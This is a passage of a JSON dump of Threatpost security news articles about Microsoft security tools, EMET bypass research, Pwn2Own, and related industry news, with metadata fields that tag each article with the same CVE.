HD Moore\u2019s [Metasploit Project](<http://metasploit.org/>) team and is known for his work on exploitation techniques.\n\nGiven the emphasis that Microsoft has placed on anti-exploitation and memory protection in its most recent releases, including Vista and Internet Explorer 8, it stands to reason that the company will continue to bring in more of the people who have done work on the other side of that fence. There\u2019s no defense like a good offense. \n", "cvss3": {}, "published": "2009-03-25T15:27:43", "type": "threatpost", "title": "Ken \"Skywing\" Johnson joins Microsoft security team", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:29", "id": "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "href": "https://threatpost.com/ken-skywing-johnson-joins-microsoft-security-team-032509/72482/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:02", "description": "Threat modeling has been part of the security culture at Microsoft for the better part of a decade, an important piece of the Security Development Lifecycle that\u2019s at the core of Trustworthy Computing.\n\nToday, Microsoft updated its free Threat Modeling Tool with a number of enhancements that bring the practice closer to not only large enterprises, but also smaller companies with a growing target on their back.\n\nFour new features have been added to the tool, including enhancements to its visualization capabilities, customization features older models and threat definitions, as well as a change to it generates threats.\n\n\u201cMore and more of the customers I have been talking to have been leveraging threat modeling as a systematic way to find design-level security and privacy weaknesses in systems they are building and operating,\u201d said Tim Rains, a Trustworthy Computing manager. \u201cThreat modeling is also used to help identify mitigations that can reduce the overall risk to a system and the data it processes. Once customers try threat modeling, they typically find it to be a useful addition to their approach to risk management.\u201d\n\nThe first iteration of Microsoft Threat Modeling Tool was issued in 2011, but Rains said customer feedback and suggestions for improvements since then have been rolled into this update. The improvements include a new drawing surface that no longer requires Microsoft Visio to build data flow diagrams. The update also includes the ability migrate older, existing threat models built with version 3.1.8 to the new format. Users can also upload existing custom-built threat definitions into the tool, which also comes with its own definitions.\n\nThe biggest change in the new version is in its threat-generation logic. Where previous versions followed [the STRIDE framework](<http://msdn.microsoft.com/en-us/magazine/cc163519.aspx>) (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege) per element, this one follows STRIDE per interaction of those elements. STRIDE helps users map threats to the properties guarding against them, for example, spoofing maps to authentication.\n\n\u201cWe take into consideration the type of elements used on the diagram (e.g. processes, data stores etc.) and what type of data flows connect these elements,\u201d Rains said.\n\nAt the RSA Conference in February, Trustworthy Computing program manager Adam Shostack said that there is [no one defined way to model threats](<http://threatpost.com/threat-modeling-legos-and-dancing-babies/104517>); that they must be specific to organizations and their particular risks.\n\n\u201cI now think of threat modeling like Legos. There are things you can snap together and use what you need,\u201d Shostack said. \u201cThere\u2019s no one way to threat model. The right way is the way that fixes good threats.\u201d\n", "cvss3": {}, "published": "2014-04-15T15:07:23", "type": "threatpost", "title": "Microsoft Releases Free Threat Modeling Tool 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-17T19:50:40", "id": "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "href": "https://threatpost.com/microsoft-releases-updated-threat-modeling-tool-2014/105467/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:32", "description": "Microsoft\u2019s research unit is investing resources in a new Web browser that could eventually signal a shift away from the ubiquitous Internet Explorer.\n\nAccording to a research paper released this week, the project is called Gazelle and is positioned as a secure web browser constructed as a multi-principal operating system.\n\nFrom [the research paper](<http://research.microsoft.com/pubs/79655/gazelle.pdf>) (.pdf):\n\nGazelle\u2019s Browser Kernel is an operating system that exclusively manages resource protection and sharing across web site principals. This construction exposes intricate design issues that no previous work has identified, such as legacy protection of cross-origin script source, and cross-principal, cross-process display and events protection. We elaborate on these issues and provide comprehensive solutions.\n\nOur prototype implementation and evaluation experience indicates that it is realistic to turn an existing browser into a multi-principal OS that yields significantly stronger security and robustness with acceptable performance and backward compatibility.\n\nMore [at Slashdot](<http://tech.slashdot.org/article.pl?sid=09/02/22/1724244>).\n", "cvss3": {}, "published": "2009-03-03T20:45:46", "type": "threatpost", "title": "Microsoft researching new (secure) browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:39", "id": "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "href": "https://threatpost.com/microsoft-researching-new-secure-browser-030309/72358/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "description": "SAN FRANCISCO \u2014 Researchers at Bromium Labs are expected to announce today they have developed an exploit that bypasses all of the mitigations in Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET). Principal security researcher Jared DeMott is scheduled to deliver a presentation this morning at the Security BSides conference explaining how the company\u2019s researchers were able to bypass all of the memory protections offered within the free Windows toolkit.\n\nThe work is significant given that Microsoft has been quick to urge customers to install and run EMET as a [temporary mitigation against zero-day exploits](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) targeting memory vulnerabilities in Windows or Internet Explorer.\n\nEMET is not meant to be permanent fix, instead it is supposed to terminate or block actions by malware or exploits threatening previously unreported vulnerabilities until a patch is available.\n\nMicrosoft is expected to release the latest version of EMET this week during the RSA Conference; Rahul Kashyap, chief security architect at Bromium, said the company has been working closely with Microsoft and expects the vulnerability to be addressed in the new EMET release.\n\nEMET comes with a dozen different mitigations starting with Data Execution Prevention and Address Space Layout Randomization, two key memory protections in Windows, as well as a handful of mitigations against return-oriented programming (ROP), heap spray and SEHOP mitigations, and more.\n\nKashyap said Bromium\u2019s bypass bypasses all of EMET\u2019s mitigations, unlike previous bypasses that were able to beat only certain aspects of the tool.\n\n\u201cWe analyzed all of the protections, and took an IE exploit and then we kept on tweaking the exploit payload until we were able to bypass all the mitigations available in EMET,\u201d Kashyap said. \u201cEverything is bypassed in its latest version.\u201d\n\nKashyap said EMET has raised the bar significantly for exploit writers trying to beat Windows\u2019 protections. Malware writers, such as those behind [Operation SnowMan targeting the latest IE zero-day](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), have taken to adding to modules that scan computers for EMET libraries and will not execute if EMET is installed.\n\n\u201cEMET, like any other tool, needs to know exploitation vectors to be able to block them. We tried to attack that very core, fundamental architectural drawback that most tools today have, which is you need to be detect an exploit in order to protect,\u201d Kashyap said. \u201cIn this case, we studied the mitigations available in EMET and then we tweaked a payload to create a new vector variant which could bypass the existing mitigations.\u201d\n\nIn a [paper](<http://labs.bromium.com/>) released today, DeMott explained that the researchers intended initially to target just the five ROP protections in EMET with a real-world browser exploit. The project grew to include all relevant protections including stack pivot protection, shellcode complete with an EAF bypass and more, DeMott wrote.\n\n\u201cThe impact of this study shows that technologies that operate on the same plane of execution as potentially malicious code, offer little lasting protection,\u201d DeMott wrote. \u201cThis is true of EMET and other similar userland protections.\u201d\n\nBromium said its research focused on 32-bit Windows 7 systems running EMET 4.0 and 4.1 (ROP protection is not implemented for 64-bit processes, the paper said.). ROP is an exploitation technique that evolved from ret2libc, which enables an attacker to inject and execute code by re-using code that already exists. The ROP technique changes executable permissions in memory space, DeMott explained in the paper, in order to execute the attacker\u2019s code located elsewhere. An attacker must chain together a series of processes in order for ROP to succeed.\n\nEMET has been bypassed numerous times before. Researcher [Aaron Portnoy](<http://thunkers.net/~deft/presentations/SummerCon%202013/Aaron_Portnoy-Bypassing_All_Of_The_Things.pptx>), cofounder of Exodus Intelligence, presented a paper during last year\u2019s SummerCon that explained a number of EMET bypasses. Two years ago, a researcher in Iran named Shahriyar Jalayeri reported [two bypasses of EMET\u2019s five ROP protections](<http://threatpost.com/researcher-finds-technique-bypass-microsofts-emet-protections-080912/76895>).\n\nYou can expect researchers to continue to try to poke holes in EMET. The upcoming Pwn2Own contest at the CanSecWest Conference is offering a $150,000 grand prize to anyone able to [bypass EMET running on Windows 8.1 and Internet Explorer 11](<http://threatpost.com/pwn2own-paying-150000-grand-prize-for-microsoft-emet-bypass/104015>).\n", "cvss3": {}, "published": "2014-02-24T08:43:50", "type": "threatpost", "title": "Complete Microsoft EMET Bypass Developed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-26T23:48:50", "id": "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "href": "https://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:04", "description": "[Howard Schmidt](<https://threatpost.com/obama-cybersecurity-chief-other-nations-key-securing-cyberspace-061311/>), the top White House information security adviser, is retiring after more than two years on the job and several decades in security both in government and private industry. Schmidt is in his second stint as the White House security chief and he\u2019s leaving at a time when cybersecurity has moved into the top tier of military and economic concerns for the country.\n\nThe departure is a blow to the Obama administration\u2019s efforts on cybersecurity and comes at a time when the White House is wrangling with Congress on legislation designed to address various information security problems and weaknesses. There are competing proposals in Congress right now and one of the major sticking points has been what kind of information companies will be allowed to share with government agencies regarding attacks and vulnerabilities.\n\nSchmidt, who will leave at the end of the month, took on the role of White House cybersecurity coordinator in early 2010 after a varied and long career in security and law enforcement. He was the CISO of Microsoft, and Air Force officer and had earlier served as the top cybersecurity officer in the George W. Bush administration. After Obama took office, the top information security job was vacant for quite a while and word at the time was that the job had been offered to a variety of top executives in the security industry, but no one had been interested.\n\nThe position was seen as having a lot of prestige, but not much in the way of power because the responsibility for information security inside the federal government is so splintered. The Department of Homeland Security, U.S. Cyber Command, National Security Agency and other groups all have some sort of responsibility for security. There were not many takers for the job of throwing a rope around all of that mess and trying to work with the private sector and other governments to fight cybercrime.\n\n\u201cThe private sector in the prevention of crime is very key, and, once again, look at a continuum. The products that are created, whether it\u2019s software or hardware, become more resistant to some of the things that we see out there, whether it\u2019s phishing/spearphishing, whether it\u2019s vulnerabilities in software and hardware where private sector has a lead role in being able to reduce that from taking place,\u201d [Schmidt said in an interview](<https://threatpost.com/obama-cybersecurity-chief-other-nations-key-securing-cyberspace-061311/>) last year.\n\n\u201cThe other piece, as when we look at some of the things like the National Cyber Security Alliance here in the U.S., we look at some of the other partnerships that take place in Australia, Canada, U.K. and how they work with the private sector, just even some of the messaging thing about how to protect your identity online. ENISA, the European Network Information Security Agency has done a lot of really good work in what they call the AR Group, the Awareness Raising Group that puts together some best practices for consumers and businesses and everything. So, working with the private sector is really key, because they can not only help build the technology that reduces the likelihood of becoming a victim, but they can also help spread the message with their customers.\u201d\n\nSchmidt will be replaced in the White House by Michael Daniel, who works in the budget office, according to a report in the [Washington Post](<http://www.washingtonpost.com/world/national-security/white-houses-cybersecurity-official-retiring/2012/05/16/gIQAX6fmUU_story.html>). Daniel has worked on intelligence and security issues for several years.\n\nOne of the major initiatives undertaken by the White House during Schmidt\u2019s tenure was the development of the National Strategy for Trusted Identities in Cyberspace, a blueprint for the adoption of non-password based online identities. Schmidt said he saw the development of alternative authentication methods as a key for improving security.\n\n\u201cWe\u2019re starting to see a lot of these companies working with other companies to make sure we\u2019re looking at the full breadth of things, not only the one-time password that may be on your mobile device, but also what can we do to make sure that somebody doesn\u2019t wind up hijacking that through some other sort of mechanism? So, overall, I think there\u2019s a full recognition of the challenges we have moving forward. The people that I\u2019ve talked to in the national program office I\u2019ve talked with recognize that the status quo doesn\u2019t apply here, that we can take a lot from the experiences we\u2019ve had in the past and the next generation of trusted identities or strong authentication or in-person proofing, we can much improve over where we\u2019ve been to date, so very, very positive,\u201d he said in the [2011 interview with Threatpost](<https://threatpost.com/schmidt-white-house-feels-very-positive-about-prospects-data-breach-bill-passing-061411/>).\n", "cvss3": {}, "published": "2012-05-17T14:54:17", "type": "threatpost", "title": "White House Security Czar Howard Schmidt Retiring", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:13", "id": "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "href": "https://threatpost.com/white-house-security-czar-howard-schmidt-retiring-051712/76577/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:27", "description": "[](<https://threatpost.com/cansecwest-caution-community-play-031909/>)\n\nCanSecWest, in beautiful Vancouver BC, is one of my favorite conferences each year. It\u2019s a cozy little security con that brings together security researchers from all parts of the security ecosystem. Like a [PhNeutral](<http://ph-neutral.darklab.org/>) or a [BlueHat](<http://technet.microsoft.com/en-us/security/cc261637.aspx>), one never quite knows what to expect out of a CanSecWest, but we do know that Microsoft products and engineers will play a prominent role. We\u2019ll be presenting new security innovations and new tools, we\u2019ll be watching Pwn2Own closely for possible hacks, and we\u2019ll be happy to discuss our industry best practices in the hallway track.\n\nSecurity gatherings such as this allow the ecosystem to exchange information and awareness in order to become more secure. The more we know about the attacks, the better prepared we can be on defense. Presentations like Matt Miller\u2019s \u201cThe Evolution of Microsoft\u2019s Exploit Mitigations\u201d and Jason Shirk and Dave Weinstein\u2019s \u201cAutomated Real-time and Post Mortem Security Crash Analysis and Categorization\u201d demonstrate that as Microsoft learns more about an attack, we incorporate this information into techniques and tools that we share with our developer community. Stay tuned for more news and posts throughout the show.\n\n**[ SEE: **[**Android, iPhone security under scrutiny at CanSecWest**](<https://threatpost.com/android-iphone-security-under-scrutiny-cansecwest-031809/>)** ]**\n\nAgain this year, [CanSecWest features the Pwn2Own contest](<http://cansecwest.com/post/2009-03-18-01:00:00.PWN2OWN_Final_Rules>) \u2013 a contest that pits researchers against technologies to see whether technology or human wins. It\u2019s also a contest that presents interesting challenges to Microsoft and a contest which you might think Microsoft opposes. Like many other issues in the security ecosystem \u2013 it\u2019s not that simple. The contest exemplifies two basic tenets behind the TwC Security teams\u2019 efforts. You can\u2019t hide from the truth (wishing doesn\u2019t make it so) and every issue is an opportunity to learn and improve.\n\nWe recognize that all vendors\u2019 products may be found vulnerable and Microsoft welcomes the contest as another opportunity to engage the security community in productive dialogue around responsible disclosure and effective security engineering. We also see that Pwn2Own provides an opportunity to educate the public and we believe it can showcase Microsoft\u2019s security engineering efforts, both relative to our competitors and in an absolute sense.\n\n**[ SEE: [Pwn2Own trifecta: Hacker exploits IE8, Firefox, Safari](<https://threatpost.com/pwn2own-trifecta-hacker-exploits-ie8-firefox-safari-031809/>) ]**\n\nThe security community is offering knowledge of attacks and defenses that consumers and other vendors can use to stay safe or create more secure products. The rest of the story \u2013 and an additional measure the security community could use to evaluate vendors\u2019 products \u2013 is what happens after the content ends. Rest assured Microsoft will take this information and apply it towards securing our networks, platforms and applications (hopefully before they ship), and to create strong response process and engineering discipline that are necessary for our communal security. And as always, the MSRC are ready to work to investigate any vulnerabilities that researchers might find during the Pwn2Own contest.\n\n**[ SEE: **[**Paul Roberts: Mobile security can no longer be ignored**](<https://threatpost.com/mobile-security-can-no-longer-be-ignored-031809/>)** ]**\n\nBy the end of the contest, co-sponsor [Tipping Point](<http://www.zerodayinitiative.com/about/>) will be the owners of many new vulnerabilities. They value the protection of their customers and will need to work with their partners in the security ecosystem to make sure everybody is protected as quickly as possible (one more way consumers benefit). One of the goals of responsible disclosure is for the vulnerability details to emerge at the same time that an update is available from the vulnerable vendor. The CanSecWest conference organizer also has a responsible disclosure policy, as do all of the conference organizers that the EcoStrat team is able to support worldwide each year.\n\nAlthough innovative contests put some of us in a place that is not always comfortable, it\u2019s valuable for the ecosystem to come together with contests like Pwn2Own and Iron Chef Black Hat, to better understand and solve common issues. It\u2019s yet another example of the \u201cteam of rivals\u201d strategy. Let the contest begin!\n\n_* Sarah Blankinship is a senior security strategist lead in Microsoft\u2019s Ecosystem Strategy team._\n", "cvss3": {}, "published": "2009-03-19T15:40:46", "type": "threatpost", "title": "CanSecWest: Caution, community at play", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T18:00:20", "id": "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "href": "https://threatpost.com/cansecwest-caution-community-play-031909/72396/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:46", "description": "In parallel with its release of 17 bulletins on Patch Tuesday this month, Microsoft also unveiled two new tools that are meant to help make a couple of common exploitation scenarios more difficult for attackers.\n\nThe company released a tool called Office File Validation for some older versions of Office, including Office 2003 and 2007. The feature is specifically designed to give users information about whether there\u2019s a potentially malicious component in an Office file that the user is trying to open. When the user attempts to open a file, the Office File Validation tool will inspect it and look for any signs of malicious behavior. If there\u2019s a problem, the user will get a warning dialog box giving him the opportunity to cancel the operation.\n\nAttackers in the past few months have taken to embedding malicious Flash files inside Word and Excel documents as part of spear phishing campaigns. This was the primary attack vector used to compromise RSA last month.\n\n\u201cOffice File Validation helps detect and prevent a kind of exploit \nknown as a file format attack. File format attacks exploit the integrity \nof a file, and occur when the structure of a file is modified with the \nintent of adding malicious code. Usually the malicious code is run \nremotely and is used to elevate the privilege of restricted accounts on \nthe computer. As a result, an attacker could gain access to a computer \nthat was not previously accessible,\u201d Microsoft said in its [advisory on the validation tool](<https://www.microsoft.com/technet/security/advisory/2501584.mspx>). \n\n\u201cThis could enable an attacker to \nread sensitive information from the computer\u2019s hard disk drive or to \ninstall malware, such as a worm or a key logging program. The Office \nFile Validation feature helps prevent file format attacks by scanning \nand validating files before they are opened. To validate files, Office \nFile Validation compares a file\u2019s structure to a predefined file schema, \nwhich is a set of rules that define what a readable file looks like. If \nOffice File Validation detects that a file\u2019s structure does not follow \nall rules described in the schema, the file does not pass validation.\u201d\n\nThe second enhancement Microsoft pushed out on Tuesday is an [update to winload.exe](<https://www.microsoft.com/technet/security/advisory/2506014.mspx>), the component that loads Windows. The update is designed to help prevent some techniques that rootkits use to evade detection and remain persistent on infected machines.\n\n\u201cFor a rootkit to be successful it must stay hidden and persistent on \na system. One way we have seen rootkits hide themselves on 64-bit \nsystems is bypassing driver signing checks done by winload.exe. While \nthe update itself won\u2019t remove a rootkit, it will expose an installed \nrootkit and give your anti-malware software the ability to detect and \nremove the rootkit,\u201d Microsoft\u2019s Dustin Childs said. \n", "cvss3": {}, "published": "2011-04-12T19:00:28", "type": "threatpost", "title": "Microsoft Pushes Out Two New Security Tools", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:34:45", "id": "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "href": "https://threatpost.com/microsoft-pushes-out-two-new-security-tools-041211/75129/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:29", "description": "Microsoft last week extended the end-of-life expiration date to July 2018 on its exploit mitigation add-on, the Enhanced Mitigation Experience Toolkit (EMET). But for some time, the once-useful tool has been well on its way out to pasture.\n\nWhile EMET was never meant to be anything more than stopgap protection against exploits, attackers and white-hat researchers accelerated its demise with a number of publicized [bypass attacks](<https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/>). That situation, plus Microsoft\u2019s urgency to have users migrate to Windows 10 and the array of new memory mitigations included in the latest OS has brought the curtain down on EMET.\n\n\u201cIt was a stopgap. It was never supposed to be something [Microsoft] wanted people to use longterm,\u201d said Cody Pierce, director of vulnerability research at Endgame. \u201cThey want people to upgrade Windows 10; for the good of their customers, they want to transition them to Windows 10 where there are some protections baked into the operating system.\u201d\n\nForemost is Control Flow Guard, a technology built to counter memory-corruption vulnerabilities, which has been available since Visual Studio 2015 and is also built into Windows 10 and Windows 8.1. [Control Flow Guard](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) is thought to be a primary impediment to [use-after-free attacks](<https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/>), which became a favorite exploit once ASLR and DEP put a damper in buffer overflow attacks.\n\n\u201cThere are a lot more compile time mitigations [in Windows 10] like Control Flow Guard, and a new Return Flow Guard feature,\u201d said Darren Kemp, security researcher with Duo Security. Kemp also pointed out that since Windows 10\u2019s mitigations are integrated into the operating system, unlike EMET, there are fewer instances where users will notice a performance hit, which was increasingly common with EMET. Also, EMET required close care when configuring it to work, otherwise it could break certain application processes.\n\n\u201cSince it\u2019s not integrated, you don\u2019t get the same type of tight coupling,\u201d Kemp said. \u201cWith a lot of stuff in EMET, you have to test the software you\u2019re applying it to, to make sure the mitigations don\u2019t cause problems. It hooks into functions and injects features. If software does non-standard things, it can cause problems with those apps.\u201d\n\nMicrosoft, meanwhile, has not had EMET on a consistent upgrade path since version 5.0 dropped in 2014. This was an abrupt change from the early days when EMET was introduced and exploits were unleashed within days of Patch Tuesday releases. In announcing the deadline extension to July 31, 2018, Microsoft\u2019s Jeffrey Sutherland acknowledged EMET\u2019s limitations against modern advanced attacks, its performance and reliability shortcomings, and urged users toward Windows 10, which makes the most of hardware virtualization to sandbox applications and links before they can harm the operating system.\n\n\u201cWith the types of threats enterprises face today, we are constantly reminded of this simple truth: modern defense against software vulnerabilities requires a modern platform,\u201d Sutherland said.\n\nThe true value of any mitigation continues to be how well it raises the cost of attacks. Pierce illustrated how advanced attackers have blown well past EMET\u2019s [menu of mitigations](<https://technet.microsoft.com/en-us/security/jj653751>) with advanced logic that automates many facets of an attack that its defenses cannot keep up with.\n\n\u201cIf you\u2019re an exploit kit writer and you acquire a zero day or develop an exploit, you have to get the most bang for your buck; and part of that is supporting a wide range of targets. If you\u2019ve got a Flash exploit, you want it to work on Firefox, Windows, Linux and more and you have to come up with ways to make it easier on you,\u201d Pierce said. \u201cA lot of the ways they\u2019ve figured out to do that bypasses a lot of these late-hook defenses like EMET. They\u2019re getting more value out of it. The types of exploit mitigations EMET provides were limited in utility due to the nature of exploitation. If you look at an exploit kit from 2010, it looks wildly different than it does now.\u201d\n\nDuo\u2019s Kemp, meanwhile, says Windows 10 is one of the hardest targets to breach today.\n\n\u201cThat\u2019s the nature of this stuff: raising the bar. If you\u2019re an attacker, do you want to invest a lot of time and energy to figure out a way around this, or are you going to go after something else?\u201d Kemp said.\n", "cvss3": {}, "published": "2016-11-07T13:50:00", "type": "threatpost", "title": "Microsoft Tears off the Band-Aid with EMET", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-15T14:12:29", "id": "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "href": "https://threatpost.com/microsoft-tears-off-the-band-aid-with-emet/121824/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:54", "description": "Microsoft has released a new version of the MS13-036 patch that was causing some customers\u2019 machines to crash. The company had recommended in the days after the original fix was first released that customers [uninstall the MS13-036 patch](<http://threatpost.com/microsoft-uninstall-faulty-patch-tuesday-security-update-041213/>) while Microsoft investigated the cause of the problems.\n\nThe new fix that Microsoft released on Tuesday resolves some conflicts with third-party applications that apparently were causing the blue screen issues for some people. The company didn\u2019t specify which software was causing the crashes, but said that the update should resolve the problems.\n\n\u201cWe\u2019ve determined that the update, when paired with certain third-party software, can cause system errors,\u201d said Trustworthy Computing group manager Dustin Childs at the time that the patch was recalled earlier this month.\n\nThe MS13-036 patch fixes a pair of race condition vulnerabilities in the Windows kernel, both of which could be used for code execution. However, the patch was rated important rather than critical because an attacker would need physical access to a vulnerable machine in order to run code using one of these bugs.\n\nChilds said in a blog post Tuesday that customers should install the revised update as soon as possible.\n\n\u201cAs we [previously discussed](<http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx> \"previously discussed\" ), we stopped distributing this update when we learned some customers were having issues. The new update, [KB2840149](<http://support.microsoft.com/kb/2840149> \"KB2840149\" ), still addresses the Moderate security issue described in MS13-036, and should not cause these issues. If you have automatic updates enabled, you won\u2019t need to take any actions. For those manually updating, we encourage you to apply this update at your earliest convenience,\u201d he said.\n", "cvss3": {}, "published": "2013-04-24T10:00:23", "type": "threatpost", "title": "Microsoft Releases Updated MS13-036 Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-24T14:02:36", "id": "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "href": "https://threatpost.com/microsoft-releases-updated-ms13-036-patch/99885/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:54", "description": "In the space of a given year, untold thousands of vulnerabilities are found in operating systems, applications and plug-ins. In many cases, the affected vendors fix the flaws, either with a patch, a workaround or some other mitigation. But there\u2019s also a huge population of security bugs that vendors never fix because they\u2019re deemed unexploitable, an assumption that may be turning into a serious mistake for software makers.\n\nMicrosoft made such a call earlier this year, after [researchers at Core Security](<http://www.coresecurity.com/content/virtual-pc-2007-hypervisor-memory-protection-bug>) informed the company that they had found a [vulnerability in the Microsoft Virtual PC software](<https://threatpost.com/microsoft-virtual-pc-flaw-lets-hackers-bypass-windows-defenses-031610/>). The flaw, which affected the virtual machine monitor (VMM) in Virtual PC, could enable an attacker to use applications running in user-space on a guest OS to access portions of the Virtual PC memory that should be inaccessible to those applications. This gives the attacker the ability to bypass anti-exploitation technologies in the underlying operating system and exploit flaws in the OS that otherwise would not be exploitable.\n\nThis problem was especially thorny for Microsoft because Virtual PC allows Windows 7 users to run applications designed for older Windows versions in a virtualized environment on their Windows 7 machines. This functionality has helped the deployment of Windows 7 in enterprise environments by making more legacy apps viable.\n\nBut Microsoft\u2019s security team said that the [Virtual PC problem was not actually a vulnerability](<http://windowsteamblog.com/blogs/windowssecurity/archive/2010/03/16/vulnerability-in-virtual-pc.aspx>) and the company hasn\u2019t released a fix for it. \n\n\u201cThe functionality that Core calls out **is not an actual vulnerability** \nper se. Instead, they are describing a way for an attacker to more \neasily exploit security vulnerabilities that must already be present on \nthe system. It\u2019s a subtle point, but one that folks should really \nunderstand. The protection mechanisms that are present in the Windows \nkernel are rendered less effective inside of a virtual machine as \nopposed to a physical machine. There is no vulnerability introduced, \njust a loss of certain security protection mechanisms,\u201d Microsoft\u2019s Paul Cooke wrote in a blog post at the time. \n\nSoftware companies large and small make these kinds of judgments on a daily basis during both the development process and the life span of a deployed product. The mere presence of a bug or vulnerability in an application doesn\u2019t mean that an attacker could necessarily use the flaw to compromise a system running the software. Plenty of bugs just cause the software to act flaky or become unstable or hang without offering an attacker any inroads into the machine. \n\nSo fixing these problems isn\u2019t always a top priority for software makers, especially if they\u2019re on tight deadlines or strict budgets. And there\u2019s always the compatibility problem to take into account: If a patch breaks some other service or feature in the application, then it may just infuriate users. So maybe all of that customer aggravation isn\u2019t worth it.\n\nThe difference in this case, experts say, is that the Virtual PC vulnerability is the symptom of a larger problem lurking beneath the surface: assuming that protections such as ASLR, DEP and SafeSEH will always be around to save us.\n\n\u201cWe\u2019re less worried about this particular vulnerability than we are \nabout the now-exposed (incorrect) assumption that various security \nmechanisms will always be in place. It\u2019s obvious that a complete \nre-calibration of exploit potential for uncategorized bugs will become \nnecessary if vulnerabilities like the one described here remain in our \nfielded systems. Not so good for Windows 7,\u201d Gary McGraw of Cigital and Ivan Arce of Core Security wrote in an [analysis of the Virtual PC situation](<http://www.informit.com/articles/article.aspx?p=1588145>) for InformIT. \n\n\u201cIn our view, design and architecture decisions made for Virtual PC \ncompletely invalidate some basic assumptions about processes in modern \nWindows operating systems. Like falling dominoes, this in turn \ninvalidates almost all anti-exploit mechanisms that Microsoft has built \ninto their OS over the past decade, which then topples over and turns an \nentire class of bugs deemed un-exploitable on non-virtualized systems \ninto potential vulnerabilities on virtualized systems. Backwards time \nwarp and a table full of fallen dominoes,\u201d they wrote.\n\nThis may seem an isolated, extreme case, but there have been other examples in the last few months of the same kind of assumptions being ground to pieces under the wheels of logic and ingenuity. After the disclosure of the high-profile attack on Google and other big companies last fall, word quickly leaked out that the flaw used to compromise the search giant was an unpatched problem in Internet Explorer. Several experts said the problem couldn\u2019t be exploited on IE 8 on Windows 7 because of the memory protections that Microsoft had added.\n\nWithin a few days, that was proven false as researcher Dino Dai Zovi, followed by others, used the [same exploit on a Windows 7 machine running IE 8](<https://threatpost.com/memory-protections-advance-exploits-stay-step-ahead-030810/>), a technique he demonstrated live at the RSA Conference in March. The point, Dai Zovi and others maintain, is that exploit mitigations are just that: mitigations.\n\n\u201cAttack mitigation takes the universe of exploit techniques and narrows \nit down,\u201d Dai Zovi said during his RSA talk.\u201dBut preventing the introduction of malicious code \nisn\u2019t enough to prevent malicious computations.\u201d\n\nThat\u2019s a point that\u2019s becoming ever clearer.\n\n\u201cMicrosoft claims that the Virtual PC problem \u2018isn\u2019t a vulnerability _per \nse_\u2018 because the problem described only affects \u201csecurity-in-depth\u201d \nmechanisms and attackers would need to find and exploit an actual \nimplementation bug to leverage it. Even if Microsoft is right on that \ncount (which we don\u2019t think they are), they are ignoring the bigger \nissue of assumptions. Bugs previously deemed non-exploitable for \nanything other than crashing systems are now potentially exploitable \nunder a virtualized OS. Because of the way bugs are slated for \nmitigation in the real world, a majority of those bugs remain unpatched \u2014 \na problem of prioritization and the enormity of the bug pile in \napplications,\u201d McGraw and Arce conclude.\n", "cvss3": 